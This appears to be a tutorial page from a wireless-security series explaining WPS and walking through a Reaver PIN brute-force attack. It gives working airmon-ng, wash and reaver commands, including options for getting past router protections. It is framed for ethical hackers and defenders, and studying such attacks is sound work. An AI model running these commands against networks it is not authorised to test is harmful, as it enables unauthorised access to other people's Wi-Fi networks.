Understanding and Exploiting
Wi-FI Protected Setup (WPS)

Understanding Wi-FI Protected Setup (WPS)

Wi-FI Protected Setup (WPS) is a feature present in many WiFi routers and access points. It's designed to provide users with a convenient way to configure devices against a wireless network by pressing a button on both the access point and the client device simultaneously. This establishes a secure WPA link between the devices. While this feature is user-friendly, it has vulnerabilities that can be exploited, especially when WPS is not disabled.

WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This is a convenient feature that allows the user to configure a client device against a wireless network by simultaneously pressing a button on both the access point and the client device (the client side “button” is often in software) at the same time. The devices trade information, and then set up a secure WPA link.

However, a tool named Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn’t been pressed on the access point. While some newer devices have built-in protection against this specific attack, the Reaver WPS exploit remains effective on many networks.

Finding a Network

After setting the hardware into monitor mode using the command:

airmon-ng start wlan0

Reaver includes its own tool for finding vulnerable WPS implementations. To start it, run:

wash -i mon0

Launching Reaver

Once you've identified a network to attack, operating Reaver is straightforward. The basic command requires only the local interface, channel, and ESSID to be specified. For example:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

Advanced Options

Some devices have implemented protections against Reaver-style attacks, and additional options may be required to get the attack moving. For example:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

Attack Duration

Reaver can take a long time to complete its run, even under ideal conditions. However, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient.

Conclusion

While WPS provides convenience, it's essential to be aware of its vulnerabilities. Ethical hackers and cybersecurity professionals should understand these vulnerabilities to ensure network security and educate others about potential risks.

← Wi-Fi Deauth Wireless Traffic Analysis →